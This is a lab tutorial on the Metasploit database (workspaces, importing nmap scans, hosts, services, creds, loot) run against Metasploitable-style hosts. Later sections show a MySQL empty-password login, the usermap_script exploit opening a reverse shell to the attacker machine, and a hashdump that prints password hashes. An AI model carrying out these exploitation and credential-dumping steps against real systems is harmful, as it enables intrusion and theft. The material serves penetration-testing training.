Using the Database in Metasploit

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Setup our Metasploit Database

In Kali, you will need to start up the postgresql server before using the database.

```
root@kali:~# systemctl start postgresql
```

After starting postgresql you need to create and initialize the msf database with msfdb init

```
root@kali:~# msfdb init
Creating database user 'msf'
Enter password for new role:
Enter it again:
Creating databases 'msf' and 'msf_test'
Creating configuration file in /usr/share/metasploit-framework/config/database.yml
Creating initial database schema
```

Using Workspaces in Metasploit

When we load up msfconsole, and run **db_status**, we can confirm that Metasploit is successfully connected to the database.

```
msf > db_status
[*] postgresql connected to msf
```

Seeing this capability is a meant to keep track of our activities and scans in order. It's imperative we start off on the right foot. Once connected to the database, we can start organizing our different movements by using what are called 'workspaces'. This gives us the ability to save different scans from different locations/networks/subnets for example.

Issuing the 'workspace' command from the msfconsole, will display the currently selected workspaces. The 'default' workspace is selected when connecting to the database, which is represented by the * beside its name.

```
msf > workspace
* default
  msfu
  lab1
  lab2
  lab3
  lab4
msf >
```

As we can see this can be quite handy when it comes to keeping things 'neat'. Let's change the current workspace to 'msfu'.

```
msf > workspace msfu
[*] Workspace: msfu
msf > workspace
  default
* msfu
  lab1
  lab2
  lab3
  lab4
msf >
```

Creating and deleting a workspace one simply uses the **-a** or **-d** followed by the name at the msfconsole prompt.

```
msf > workspace -a lab4
[*] Added workspace: lab4
msf >
```

```
msf > workspace -d lab4
[*] Deleted workspace: lab4
msf > workspace
```

It's that simple, using the same command and adding the **-h** switch will provide us with the command's other capabilities.

```
msf > workspace -h
Usage:
   workspace
                              List workspaces
   workspace -v
                               List workspaces verbosely
                              Switch workspace
   workspace [name]
   workspace -a [name] ...
                              Add workspace(s)
   workspace -d [name] ...
                              Delete workspace(s)
   workspace -D
                              Delete all workspaces
   workspace -r
                    Rename workspace
   workspace -h
                               Show this help information
msf >
```

From now on any scan or imports from 3rd party applications will be saved into this workspace.

Now that we are connected to our database and workspace setup, lets look at populating it with some data. First we'll look at the different 'db_' commands available to use using the **help** command from the msfconsole.

```
msf > help
...snip...

Database Backend Commands
-----
```

Command	Description
creds	List all credentials in the database
db_connect	Connect to an existing database
db_disconnect	Disconnect from the current database instance
db_export	Export a file containing the contents of the database
db_import	<pre>Import a scan result file (filetype will be auto-detected)</pre>
db_nmap	Executes nmap and records the output automatically
db_rebuild_cache	Rebuilds the database-stored module cache
db_status	Show the current database status
hosts	List all hosts in the database

workspace

```
loot     List all loot in the database
notes     List all notes in the database
services     List all services in the database
vulns     List all vulnerabilities in the database
```

Switch between database workspaces

Importing and Scanning

There are several ways we can do this, from scanning a host or network directly from the console, or importing a file from an earlier scan. Let's start by importing an nmap scan of the 'metasploitable 2' host. This is done using **db_import** followed by the path to our file.

```
msf > db_import /root/msfu/nmapScan
[*] Importing 'Nmap XML' data
[*] Import: Parsing with 'Rex::Parser::NmapXMLStreamParser'
[*] Importing host 172.16.194.172
[*] Successfully imported /root/msfu/nmapScan
msf > hosts
Hosts
=====
address
                mac
                                    name
                                          os name os flavor os sp
                                                                      purpose info
                                                                                     comments
-----
                                          _ _ _ _ _ _
                                                    _ _ _ _ _ _ _ _
172.16.194.172 00:0C:29:D1:62:80
                                          Linux
                                                   Ubuntu
                                                                      server
msf >
```

Once completed we can confirm the import by issuing the **hosts** command. This will display all the hosts stored in our current workspace. We can also scan a host directly from the console using the **db_nmap** command. Scan results will be saved in our current database. The command works the same way as the command line version of nmap.

```
[*] Nmap: HOP RTT
                      ADDRESS
              0.31 ms 172.16.194.134
[*] Nmap: 1
[*] Nmap: OS and Service detection performed. Please report any incorrect results at http://nmap
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 14.91 seconds
msf >
msf > hosts
Hosts
address
               mac
                                   name os_name
                                                            os_flavor os_sp
                                                                              purpose info
-----
172.16.194.134 00:0C:29:68:51:BB
                                         Microsoft Windows
                                                            XΡ
                                                                               server
172.16.194.172 00:0C:29:D1:62:80
                                         Linux
                                                            Ubuntu
                                                                               server
msf >
```

Backing Up Our Data

Exporting our data outside the Metasploit environment is very simple. Using the **db_export** command all our gathered information can be saved in a XML file. This format can be easily used and manipulated later for reporting purposes. The command has 2 outputs, the xml format, which will export all of the information currently stored in our active workspace, and the pwdump format, which exports everything related to used/gathered credentials.

```
msf > db_export -h
Usage:
   db export -f [-a] [filename]
    Format can be one of: xml, pwdump
[-] No output file was specified
msf > db_export -f xml /root/msfu/Exported.xml
[*] Starting export of workspace msfu to /root/msfu/Exported.xml [ xml ]...
[*]
       >> Starting export of report
[*]
       >> Starting export of hosts
[*]
       >> Starting export of events
[*]
       >> Starting export of services
[*]
       >> Starting export of credentials
[*]
       >> Starting export of web sites
[*]
       >> Starting export of web pages
```

```
[*] >> Starting export of web forms
[*] >> Starting export of web vulns
[*] >> Finished export of report
[*] Finished export of workspace msfu to /root/msfu/Exported.xml [ xml ]...
```

Using the Hosts Command

Now that we can import and export information to and from our database, let us look at how we can use this information within the msfconsole. Many commands are available to search for specific information stored in our database. Hosts names, address, discovered services etc. We can even use the resulting data to populate module settings such as RHOSTS. We'll look how this is done a bit later.

The **hosts** command was used earlier to confirm the presence of data in our database. Let's look at the different options available and see how we use it to provide us with quick and useful information. Issuing the command with **-h** will display the help menu.

```
msf > hosts -h
Usage: hosts [ options ] [addr1 addr2 ...]
OPTIONS:
  -a,--add
                    Add the hosts instead of searching
  -d,--delete
                    Delete the hosts instead of searching
         Only show the given columns (see list below)
  -h,--help
                    Show this help information
                    Only show hosts which are up
  -u,--up
              Send output to a file in csv format
  - 0
  -0
            Order rows by specified column number
  -R,--rhosts
                    Set RHOSTS from the results of the search
  -S,--search
                    Search string to filter by
  -i,--info
                    Change the info of a host
  -n,--name
                    Change the name of a host
  -m,--comment
                    Change the comment of a host
                    Add or specify a tag to a range of hosts
  -t,--tag
Available columns: address, arch, comm, comments, created_at, cred_count, detected_arch, exploit
```

We'll start by asking the **hosts** command to display only the IP address and OS type using the **-c** switch.

```
msf > hosts -c address,os_flavor
Hosts
=====
```

address	os_flavor		
172.16.194.134	XP		
172.16.194.172	Ubuntu		

Setting up Modules

Another interesting feature available to us, is the ability to search all our entries for something specific. Imagine if we wished to find only the Linux based machines from our scan. For this we'd use the **-S** option. This option can be combined with our previous example and help fine tune our results.

Using the output of our previous example, we'll feed that into the 'tcp' scan auxiliary module.

```
msf auxiliary(tcp) > show options
```

Module options (auxiliary/scanner/portscan/tcp):

Name	Current Setting	Required	Description
CONCURRENCY	10	yes	The number of concurrent ports to check per host
FILTER		no	The filter string for capturing traffic
INTERFACE		no	The name of the interface
PCAPFILE		no	The name of the PCAP capture file to process
PORTS	1-10000	yes	Ports to scan (e.g. 22-25,80,110-900)
RH0STS		yes	The target address range or CIDR identifier
SNAPLEN	65535	yes	The number of bytes to capture
THREADS	1	yes	The number of concurrent threads
TIMEOUT	1000	yes	The socket connect timeout in milliseconds

We can see by default, nothing is set in 'RHOSTS', we'll add the **-R** switch to the hosts command and run the module. Hopefully it will run and scan our target without any problems.

```
msf auxiliary(tcp) > hosts -c address,os_flavor -S Linux -R
Hosts
=====
               os_flavor
address
-----
                -----
172.16.194.172 Ubuntu
RHOSTS => 172.16.194.172
msf auxiliary(tcp) > run
[*] 172.16.194.172:25 - TCP OPEN
[*] 172.16.194.172:23 - TCP OPEN
[*] 172.16.194.172:22 - TCP OPEN
[*] 172.16.194.172:21 - TCP OPEN
[*] 172.16.194.172:53 - TCP OPEN
[*] 172.16.194.172:80 - TCP OPEN
...snip...
[*] 172.16.194.172:5432 - TCP OPEN
[*] 172.16.194.172:5900 - TCP OPEN
[*] 172.16.194.172:6000 - TCP OPEN
[*] 172.16.194.172:6667 - TCP OPEN
[*] 172.16.194.172:6697 - TCP OPEN
[*] 172.16.194.172:8009 - TCP OPEN
[*] 172.16.194.172:8180 - TCP OPEN
[*] 172.16.194.172:8787 - TCP OPEN
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

Of course this also works if our results contain more than one address.

```
msf auxiliary(tcp) > hosts -R
Hosts
=====
```

address	mac	name	os_name	os_flavor	os_sp	purpose	info	com

```
      172.16.194.134
      00:0C:29:68:51:BB
      Microsoft Windows XP
      server

      172.16.194.172
      00:0C:29:D1:62:80
      Linux
      Ubuntu
      server
```

RHOSTS => 172.16.194.134 172.16.194.172

msf auxiliary(tcp) > show options

Module options (auxiliary/scanner/portscan/tcp):

Name	Current Setting	Required	Description
CONCURRENCY	10	yes	The number of concurrent ports to check
FILTER		no	The filter string for capturing traffic
INTERFACE		no	The name of the interface
PCAPFILE		no	The name of the PCAP capture file to pr
PORTS	1-10000	yes	Ports to scan (e.g. 22-25,80,110-900)
RH0STS	172.16.194.134 172.16.194.172	yes	The target address range or CIDR identi
SNAPLEN	65535	yes	The number of bytes to capture
THREADS	1	yes	The number of concurrent threads
TIMEOUT	1000	yes	The socket connect timeout in milliseco

You can see how useful this may be if our database contained hundreds of entries. We could search for Windows machines only, then set the RHOSTS option for the smb_version auxiliary module very quickly. The set RHOSTS switch is available in almost all of the commands that interact with the database.

Services

Another way to search the database is by using the **services** command. Like the previous examples, we can extract very specific information with little effort.

```
msf > services -h
Usage: services [-h] [-u] [-a] [-r ] [-p >port1,port2>] [-s >name1,name2>] [-o ] [addr1 addr2 ...
  -a,--add
                    Add the services instead of searching
  -d,--delete
                    Delete the services instead of searching
         Only show the given columns
  -h,--help
                    Show this help information
       Search for a list of service names
  - S
       Search for a list of ports
  - p
          Only show [tcp|udp] services
  -r
                    Only show services which are up
  -u,--up
              Send output to a file in csv format
```

```
-R,--rhosts Set RHOSTS from the results of the search
-S,--search Search string to filter by
```

msf > services -c name, info 172.16.194.134

Available columns: created_at, info, name, port, proto, state, updated_at

→

Much in the same way as the **hosts** command, we can specify which fields to be displayed. Coupled with the **-S** switch, we can also search for a service containing a particular string.

```
Services
host
                name
                              info
----
172.16.194.134
                              Apache httpd 2.2.17 (Win32) mod ssl/2.2.17 OpenSSL/0.9.80 PHP/5.3.
                http
172.16.194.134
                              Microsoft Windows RPC
                msrpc
172.16.194.134
                netbios-ssn
172.16.194.134
                http
                              Apache httpd 2.2.17 (Win32) mod ssl/2.2.17 OpenSSL/0.9.80 PHP/5.3.
               microsoft-ds Microsoft Windows XP microsoft-ds
172.16.194.134
172.16.194.134
               mysql
```

Here we are searching all hosts contained in our database with a service name containing the string 'http'.

The combinations for searching are enormous. We can use specific ports, or port ranges. Full or partial service name when using the **-s** or **-S** switches. For all hosts or just a select few... The list goes on and on. Here are a few examples, but you may need to experiment with these features in order to get what you want and need out your searches.

```
msf > services -c info, name -p 445
```

Services

======

host info name
---- 172.16.194.134 Microsoft Windows XP microsoft-ds microsoft-ds
172.16.194.172 Samba smbd 3.X workgroup: WORKGROUP netbios-ssn

msf > services -c port,proto,state -p 70-81

Services

======

host port proto state ---- -----172.16.194.134 80 tcp open 172.16.194.172 75 closed tcp 172.16.194.172 71 tcp closed 172.16.194.172 72 closed tcp 172.16.194.172 73 tcp closed 172.16.194.172 74 closed tcp 172.16.194.172 70 closed tcp 172.16.194.172 76 closed tcp 172.16.194.172 77 tcp closed 172.16.194.172 78 closed tcp 172.16.194.172 79 tcp closed 172.16.194.172 80 tcp open 172.16.194.172 81 tcp closed

msf > services -s http -c port 172.16.194.134

Services

=======

host port ----172.16.194.134 80 172.16.194.134 443

msf > services -S Unr

Services

======

host port proto name state info

```
172.16.194.172 6667 tcp
                       irc open Unreal ircd
172.16.194.172 6697 tcp
                        irc open Unreal ircd
```

CSV Export

Both the hosts and services commands give us a means of saving our query results into a file. The file format is a comma separated value, or CSV. Followed by the -o with path and filename, the information that has been displayed on the screen at this point will now be saved to disk.

```
msf > services -s http -c port 172.16.194.134 -o /root/msfu/http.csv
[*] Wrote services to /root/msfu/http.csv
msf > hosts -S Linux -o /root/msfu/linux.csv
[*] Wrote hosts to /root/msfu/linux.csv
msf > cat /root/msfu/linux.csv
[*] exec: cat /root/msfu/linux.csv
address, mac, name, os_name, os_flavor, os_sp, purpose, info, comments
"172.16.194.172", "00:0C:29:D1:62:80", "", "Linux", "Debian", "", "server", "", ""
msf > cat /root/msfu/http.csv
[*] exec: cat /root/msfu/http.csv
host, port
"172.16.194.134", "80"
"172.16.194.134", "443"
```

Creds

The creds command is used to manage found and used credentials for targets in our database. Running this command without any options will display currently saved credentials.

```
msf > creds
Credentials
host port user pass type active?
```

```
---- ---- ----
```

[*] Found 0 credentials.

As with 'db_nmap' command, successful results relating to credentials will be automatically saved to our active workspace. Let's run the auxiliary module 'mysql_login' and see what happens when Metasploit scans our server.

```
msf auxiliary(mysql_login) > run
[*] 172.16.194.172:3306 MYSQL - Found remote MySQL version 5.0.51a
[*] 172.16.194.172:3306 MYSQL - [1/2] - Trying username: 'root' with password: ''
[*] 172.16.194.172:3306 - SUCCESSFUL LOGIN 'root' : ''
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
   auxiliary(mysql_login) > creds
Credentials
host
                                            active?
                           pass type
                port user
                                            -----
172.16.194.172 3306 root
                                  password true
[*] Found 1 credential.
msf auxiliary(mysql_login) >
```

We can see the module was able to connect to our mysql server, and because of this Metasploit saved the credentials in our database automatically for future reference.

During post-exploitation of a host, gathering user credentials is an important activity in order to further penetrate a target network. As we gather sets of credentials, we can add them to our database with the **creds -a** command.

```
172.16.194.134 445 Administrator 7bf4f254b222bb24aad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f0
```

[*] Found 1 credential.

Loot

Once you've compromised a system (or three), one of the objective may be to retrieve hash dumps. From either a Windows or *nix system. In the event of a successful hash dump, this information will be stored in our database. We can view this dumps using the **loot** command. As with almost every command, adding the **-h** switch will display a little more information.

```
msf > loot -h
Usage: loot
 Info: loot [-h] [addr1 addr2 ...] [-t ]
  Add: loot -f [fname] -i [info] -a [addr1 addr2 ...] [-t [type]
  Del: loot -d [addr1 addr2 ...]
  -a, --add
                    Add loot to the list of addresses, instead of listing
  -d,--delete
                    Delete *all* loot matching host and type
  -f,--file
                    File with contents of the loot to add
  -i,--info
                    Info of the loot to add
       Search for a list of types
  -h,--help
                    Show this help information
  -S,--search
                    Search string to filter by
```

Here's an example of how one would populate the database with some **loot**.

```
msf exploit(usermap_script) > exploit

[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 4uGPYOrars50ojdL;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "4uGPYOrars50ojdL\r\n"
[*] Matching...
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (172.16.194.163:4444 -> 172.16.194.172:55138) at 2012-06-27 1
```

```
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^Z
Background session 1? [y/N] y
    exploit(usermap script) > use post/linux/gather/hashdump
    post(hashdump) > show options
Module options (post/linux/gather/hashdump):
  Name
            Current Setting Required Description
   - - - -
            _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
                                       ______
                                       The session to run this module on.
  SESSION 1
                             yes
msf post(hashdump) > sessions -l
Active sessions
_____
  Id Type
                  Information Connection
                  -----
  1
     shell unix
                               172.16.194.163:4444 -> 172.16.194.172:55138 (172.16.194.172)
msf post(hashdump) > run
[+] root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:0:0:root:/root:/bin/bash
[+] sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:3:3:sys:/dev:/bin/sh
[+] klog:$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0:103:104::/home/klog:/bin/false
[+] msfadmin:$1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
[+] postgres:$1$Rw35ik.x$MgQgZUu05pAoUvfJhfcYe/:108:117:PostgreSQL administrator,,,:/var/lib/pos
[+] user:$1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0:1001:1001:just a user,111,,:/home/user:/bin/bash
[+] service:$1$kR3ue7JZ$7GxELDupr50hp6cjZ3Bu//:1002:1002:,,,:/home/service:/bin/bash
[+] Unshadowed Password File: /root/.msf4/loot/20120627193921_msfu_172.16.194.172_linux.hashes_2
[*] Post module execution completed
msf post(hashdump) > loot
Loot
```

host	service	type	name	content	info
172.16.194.172		linux.hashes	unshadowed_passwd.pwd	text/plain	Linux Unshadowed Passw
172.16.194.172		linux.passwd	passwd.tx	text/plain	Linux Passwd File
172.16.194.172		linux.shadow	shadow.tx	text/plain	Linux Password Shadow

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